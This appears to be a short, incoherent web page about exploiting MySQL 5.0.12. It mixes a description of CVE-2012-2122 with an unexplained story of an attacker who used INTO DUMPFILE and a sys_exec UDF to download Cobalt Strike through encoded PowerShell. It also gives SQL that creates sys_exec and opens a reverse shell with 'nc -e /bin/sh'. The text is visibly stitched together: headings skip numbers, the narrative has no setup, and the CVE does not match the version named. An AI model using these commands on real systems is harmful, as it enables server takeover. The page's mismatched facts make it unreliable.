Exploit | Mysql 5.0.12

MySQL 5.0.12 Exploit: Understanding the Vulnerability

The Flaw: A bug in the password hashing comparison allows a user to log in with an incorrect password. Due to a casting error around the memcmp return value, the check can occasionally return "true" even for a wrong password.

The Most Famous Exploit: CVE-2012-2122 (The "1 in 256" Flaw)

He didn't run sys_exec('cmd.exe /c format C:'). That was amateur hour. Instead, he ran:

  1. Used INTO DUMPFILE to write udf.dll to C:\Windows\Temp\.
  2. Created sys_exec and sys_eval.
  3. Ran sys_exec('powershell -enc base64...') to download Cobalt Strike.
  4. Pivoted to the domain controller, causing a $6M breach.

1. Version Upgrades (The Obvious Fix)

MySQL 5.0.15 and later introduced stricter checks: only users with the INSERT privilege on mysql.func could create UDFs. MySQL 5.1 added the plugin_dir variable, requiring UDF libraries to reside in a dedicated directory that should not be writable by the server.

  -- Create the function mapping
  CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.so';
  -- Verify the function exists
  SELECT * FROM mysql.func;
  -- Execute a command (e.g., creating a reverse shell)
  SELECT sys_exec('nc -e /bin/sh ');

3. Impact and Remediation